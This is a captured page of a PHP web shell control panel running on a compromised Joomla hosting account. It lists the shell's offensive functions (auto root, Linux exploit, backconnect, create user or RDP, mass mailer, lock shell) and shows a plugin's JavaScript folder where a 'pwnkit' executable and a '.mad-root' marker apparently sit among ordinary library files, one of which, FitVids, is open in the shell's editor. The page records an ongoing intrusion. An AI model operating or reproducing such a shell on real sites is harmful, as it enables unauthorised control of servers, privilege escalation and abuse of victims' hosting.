Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
plugins /
system /
bluejoomla /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
bootstrap.min.js
28.74
KB
-rw----r--
dropline.js
2.01
KB
-rw----r--
fitvids.js
2.13
KB
-rw----r--
index.html
44
B
-rw----r--
jquery-noconflict.js
266
B
-rw----r--
jquery.isotope.min.js
15.58
KB
-rw----r--
jquery.min.js
91.44
KB
-rw----r--
jquery.themepunch.revolution.m...
107.7
KB
-rw----r--
jquery.themepunch.tools.min.js
92.79
KB
-rw----r--
menu.js
12.13
KB
-rw----r--
mobilemenu.js
2.63
KB
-rw----r--
modernizr-2.6.2.min.js
15.05
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
respond.min.js
3.95
KB
-rw----r--
selectivizr-min.js
4.72
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fitvids.js
/*global jQuery */ /*! * FitVids 1.0 * * Copyright 2011, Chris Coyier - http://css-tricks.com + Dave Rupert - http://daverupert.com * Credit to Thierry Koblentz - http://www.alistapart.com/articles/creating-intrinsic-ratios-for-video/ * Released under the WTFPL license - http://sam.zoy.org/wtfpl/ * * Date: Thu Sept 01 18:00:00 2011 -0500 */ (function( $ ){ $.fn.fitVids = function() { var div = document.createElement('div'), ref = document.getElementsByTagName('base')[0] || document.getElementsByTagName('script')[0]; div.className = 'fit-vids-style'; div.innerHTML = '­<style> \ .fluid-width-video-wrapper { \ width: 100%; \ position: relative; \ padding: 0; \ } \ \ .fluid-width-video-wrapper iframe, \ .fluid-width-video-wrapper object, \ .fluid-width-video-wrapper embed { \ position: absolute; \ top: 0; \ left: 0; \ width: 100%; \ height: 100%; \ } \ </style>'; ref.parentNode.insertBefore(div,ref); return this.each(function(){ var selectors = [ "iframe[src^='http://player.vimeo.com']", "iframe[src^='http://www.youtube.com']", "iframe[src^='https://www.youtube.com']", "iframe[src^='http://www.kickstarter.com']", "object", "embed" ]; var $allVideos = $(this).find(selectors.join(',')); $allVideos.each(function(){ var $this = $(this), height = this.tagName == 'OBJECT' ? $this.attr('height') : $this.height(), aspectRatio = height / $this.width(); $this.wrap('<div class="fluid-width-video-wrapper" />').parent('.fluid-width-video-wrapper').css('padding-top', (aspectRatio * 100)+"%"); $this.removeAttr('height').removeAttr('width'); }); }); } })( jQuery );
Close